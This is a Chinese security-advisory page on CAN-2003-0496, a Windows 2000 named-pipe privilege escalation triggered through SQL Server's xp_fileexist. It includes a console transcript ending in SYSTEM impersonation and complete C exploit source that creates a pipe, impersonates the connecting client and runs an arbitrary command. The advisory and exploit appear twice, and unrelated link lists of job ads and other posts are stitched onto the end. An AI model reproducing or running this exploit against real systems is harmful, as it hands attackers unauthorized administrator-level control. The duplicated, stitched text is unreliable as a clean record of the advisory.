Microsoft Windows CreateFile API命名管道权限提升漏洞
来源:互联网 发布:算法工程师 课程 编辑:程序博客网 时间:2024/04/30 09:24
发布时间:2003-07-08
更新时间:2003-07-15
严重程度:高
威胁程度:本地管理员权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8128
CVE(CAN) ID:CAN-2003-0496
受影响系统
Microsoft Windows未能正确处理CreateFile API建立的命名管道,当以此命名管道作为参数传递给SQL Server的xp_fileexist存储过程时会导致攻击者以SQL进程的权限执行任意命令。
测试代码
C:/>mssqlpipe.exe cmd.exe
Creating pipe: //./Pipe/atstake
Pipe created, waiting for connectection
Connect to the database (with isql for example) and execute:
xp_fileexist '//SERVERNAME/pipe/atsstake'
Then in command shell #2:
C:/>isql -U andreas
Password:
1> xp_fileexist '//TEMP123/pipe/atstake'
2> go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
1 0 1
Then, back in command shell #1:
Impersonate user successful, we are running as user: SYSTEM
/* tac0tac0.c - pay no attention to the name, long
story...
*
* Author: Maceo
* Modified to take advantage of CAN-2003-0496 Named
Pipe Filename
* Local Privilege Escalation Found by @stake. Use with
their Advisory.
* -wirepair@sh0dan.org http://sh0dan.org
*
*
* All credits for code go to Maceo, i really did
minimal work
* with his code, it took me like 3 seconds heh.
* Shouts to #innercircle,
*
*/
#include <stdio.h>
#include <windows.h>
int main(int argc, char **argv)
{
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
if (argc != 2) {
fprintf(stderr, "Usage: %s <cmd.exe>/nNamed Pipe Local
Priv Escalation found by @stake./n"
"This code is to be used with MS-SQL exactly as
outlined in their advisory/n"
"All credit for this code goes to Maceo, he did a
fine job.. -wire/n",argv[0]);
exit(1);
}
// build the next named pipe name //
char szPipe[64];
//sprintf(szPipe, "////.//pipe//net//NtControlPipe%lu",
++dwNumber);
sprintf(szPipe, "////.//pipe//poop");
// create the named pipe before scm can //
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT,
2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf ("Failed to create named pipe:/n %s/n",
szPipe);
return 3;
}
ConnectNamedPipe (hPipe, NULL);
// assume the identity of the client //
if (!ImpersonateNamedPipeClient (hPipe))
{
printf ("Failed to impersonate the named pipe./n");
CloseHandle(hPipe);
return 5;
}
// display impersonating users name //
dwSize = 256;
char szUser[256];
GetUserName(szUser, &dwSize);
printf ("Impersonating: %s/n", szUser);
system(argv[1]);
CloseHandle(hPipe);
return 0;
}
解决方案
厂商已经在最新的补丁包中修补了此漏洞:
Microsoft Windows 2000 Server SP3:
Microsoft Upgrade Windows 2000 SP4
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp
相关信息
Named Pipe Filename Local Privilege Escalation
http://www.atstake.com/research/advisories/2003/a070803-1.txt
更新时间:2003-07-15
严重程度:高
威胁程度:本地管理员权限
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8128
CVE(CAN) ID:CAN-2003-0496
受影响系统
Microsoft Windows 2000 Advanced Server SP3未影响系统
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Terminal Services SP3
+Microsoft Windows 2000 Advanced Server SP3
+Microsoft Windows 2000 Datacenter Server SP3
+Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+Microsoft Windows 2000 Advanced Server SP2
+Microsoft Windows 2000 Datacenter Server SP2
+Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+Microsoft Windows 2000 Advanced Server SP1
+Microsoft Windows 2000 Datacenter Server SP1
+Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+Microsoft Windows 2000 Advanced Server
+Microsoft Windows 2000 Datacenter Server
+Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server SP4详细描述
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Terminal Services SP4
+Microsoft Windows 2000 Advanced Server SP4
+Microsoft Windows 2000 Datacenter Server SP4
+Microsoft Windows 2000 Server SP4
Microsoft Windows未能正确处理CreateFile API建立的命名管道,当以此命名管道作为参数传递给SQL Server的xp_fileexist存储过程时会导致攻击者以SQL进程的权限执行任意命令。
测试代码
C:/>mssqlpipe.exe cmd.exe
Creating pipe: //./Pipe/atstake
Pipe created, waiting for connectection
Connect to the database (with isql for example) and execute:
xp_fileexist '//SERVERNAME/pipe/atsstake'
Then in command shell #2:
C:/>isql -U andreas
Password:
1> xp_fileexist '//TEMP123/pipe/atstake'
2> go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
1 0 1
Then, back in command shell #1:
Impersonate user successful, we are running as user: SYSTEM
/* tac0tac0.c - pay no attention to the name, long
story...
*
* Author: Maceo
* Modified to take advantage of CAN-2003-0496 Named
Pipe Filename
* Local Privilege Escalation Found by @stake. Use with
their Advisory.
* -wirepair@sh0dan.org http://sh0dan.org
*
*
* All credits for code go to Maceo, i really did
minimal work
* with his code, it took me like 3 seconds heh.
* Shouts to #innercircle,
*
*/
#include <stdio.h>
#include <windows.h>
int main(int argc, char **argv)
{
DWORD dwNumber = 0;
DWORD dwType = REG_DWORD;
DWORD dwSize = sizeof(DWORD);
if (argc != 2) {
fprintf(stderr, "Usage: %s <cmd.exe>/nNamed Pipe Local
Priv Escalation found by @stake./n"
"This code is to be used with MS-SQL exactly as
outlined in their advisory/n"
"All credit for this code goes to Maceo, he did a
fine job.. -wire/n",argv[0]);
exit(1);
}
// build the next named pipe name //
char szPipe[64];
//sprintf(szPipe, "////.//pipe//net//NtControlPipe%lu",
++dwNumber);
sprintf(szPipe, "////.//pipe//poop");
// create the named pipe before scm can //
HANDLE hPipe = 0;
hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_WAIT,
2, 0, 0, 0, NULL);
if (hPipe == INVALID_HANDLE_VALUE)
{
printf ("Failed to create named pipe:/n %s/n",
szPipe);
return 3;
}
ConnectNamedPipe (hPipe, NULL);
// assume the identity of the client //
if (!ImpersonateNamedPipeClient (hPipe))
{
printf ("Failed to impersonate the named pipe./n");
CloseHandle(hPipe);
return 5;
}
// display impersonating users name //
dwSize = 256;
char szUser[256];
GetUserName(szUser, &dwSize);
printf ("Impersonating: %s/n", szUser);
system(argv[1]);
CloseHandle(hPipe);
return 0;
}
解决方案
厂商已经在最新的补丁包中修补了此漏洞:
Microsoft Windows 2000 Server SP3:
Microsoft Upgrade Windows 2000 SP4
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp
相关信息
Named Pipe Filename Local Privilege Escalation
http://www.atstake.com/research/advisories/2003/a070803-1.txt
- Microsoft Windows CreateFile API命名管道权限提升漏洞
- Microsoft Windows CreateFile API命名管道权限提升漏洞
- Microsoft Windows键盘事件权限提升漏洞
- Microsoft Windows Kernel整数截断本地权限提升漏洞:触发原因-汇编形态
- CreateFile - Windows API
- CreateFile - Windows API
- Windows API —CreateFile
- Windows XP 核心驱动 secdrv.sys 本地权限提升漏洞
- 管道和命名管道(windows)
- windows管道系统 ----命名管道
- Microsoft IIS文件更改通知本地权限提升漏洞(MS08-005)
- Windows 命名管道1
- Windows 命名管道2
- Windows命名管道
- DISCUZ漏洞与提升权限
- WINDOWS命名漏洞
- Windows API应用:CreateFile,WriteFile,ReadFile
- Windows管道系统 - 命名管道
- 微软上海全球技术支持中心招聘Axapta技术支持工程师
- 猪好像心情不好-_-
- 微软上海全球技术支持中心招聘Axapta供应链支持工程师
- 判断浏览器是是否支持某属性或方法
- 微软上海全球技术支持中心招聘Axapta财务支持工程师
- Microsoft Windows CreateFile API命名管道权限提升漏洞
- 鼎强软件(上海)有限公司招聘Axapta顾问
- 上海创景管理咨询有限公司招聘Axapta Delivery Director
- 将用户个性化设置保存到客户端
- 鼎强软件(上海)有限公司招聘Axapta工程师
- 把Gmail当网络硬盘用
- javascrpt的浮动页面
- MS05-055漏洞分析
- Eval方法(执行Javascript字串命令)
